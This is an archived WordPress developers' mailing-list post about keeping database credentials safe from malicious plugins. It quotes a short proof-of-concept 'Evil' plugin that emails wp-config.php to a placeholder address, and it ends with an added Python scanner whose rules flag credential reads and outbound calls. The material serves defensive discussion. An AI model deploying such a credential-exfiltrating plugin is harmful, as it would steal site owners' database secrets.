[wp-hackers] Keeping database connection info safe

Sam Angove sam at rephrase.net
Sat Feb 25 00:49:41 GMT 2006


On 2/25/06, Joseph Scott <joseph at randomnetworks.com> wrote:
>
> It would be very easy to include some malicious code in a plugin that
> would attempt to email out those details to "bad people".  So my
> first thought was to simply undefine the database connection info
> once a successful database connection has been established.

<?php
/*
Plugin Name: Evil
*/
wp_mail( 'dr.claw at example.com', '', file_get_contents(ABSPATH .
'wp-config.php') );
?>

Dave Grijalva wrote:
> A better way to do this with php5 is to use private member variables and a
> setter function, but I don't think there is a PHP4 equivalent.  Can anybody
> out there think of a PHP4 compatible way to secure that data?

You could still read in the source file containing the setter, so
you're right back where you started.
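
An added example, not part of the thread or of WordPress: because a plugin runs with the same file and constant access as WordPress itself, one practical control is reviewing plugin source before it is installed. This Python scanner flags lines that touch wp-config.php or the DB_* constants and raises the severity when the same file also sends data out. The rule lists, the function names and the second and third samples are assumptions constructed for illustration, and the result is a triage aid for manual review, not proof that a plugin is safe.

```python
import re

# Heuristic rules (assumed for this example, not an exhaustive list).
RULES = {
    "config_file": re.compile(r"wp-config\.php", re.I),
    "db_constant": re.compile(r"\bDB_(?:NAME|USER|PASSWORD|HOST)\b"),
    "file_read": re.compile(
        r"\b(?:file_get_contents|fopen|readfile|file|show_source|highlight_file)\s*\(", re.I),
    "outbound": re.compile(
        r"\b(?:wp_mail|mail|wp_remote_post|curl_exec|fsockopen)\s*\(", re.I),
}

def scan(source):
    """Return (line_number, rule) pairs, in line order, for every rule a line matches."""
    hits = []
    for number, line in enumerate(source.splitlines(), 1):
        for rule, pattern in RULES.items():
            if pattern.search(line):
                hits.append((number, rule))
    return hits

def verdict(hits):
    """'high' = touches credentials and sends data out; 'review' = touches credentials."""
    rules = {rule for _, rule in hits}
    touches_secret = bool(rules & {"config_file", "db_constant"})
    if touches_secret and "outbound" in rules:
        return "high"
    return "review" if touches_secret else "none"

# The plugin quoted in the message above, with its wrapped line rejoined.
EVIL = """<?php
/*
Plugin Name: Evil
*/
wp_mail( 'dr.claw at example.com', '', file_get_contents(ABSPATH . 'wp-config.php') );
?>
"""

# Constructed samples: a harmless plugin, and one that only names a DB constant.
BENIGN = """<?php
/*
Plugin Name: Hello Footer
*/
function hello_footer() { echo '<p>Hello</p>'; }
add_action( 'wp_footer', 'hello_footer' );
?>
"""
REVIEW = "<?php\n$backup = 'backup-' . DB_NAME . '.sql';\n"

if __name__ == "__main__":
    for name, src in (("EVIL", EVIL), ("BENIGN", BENIGN), ("REVIEW", REVIEW)):
        print(name, verdict(scan(src)), scan(src))
```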

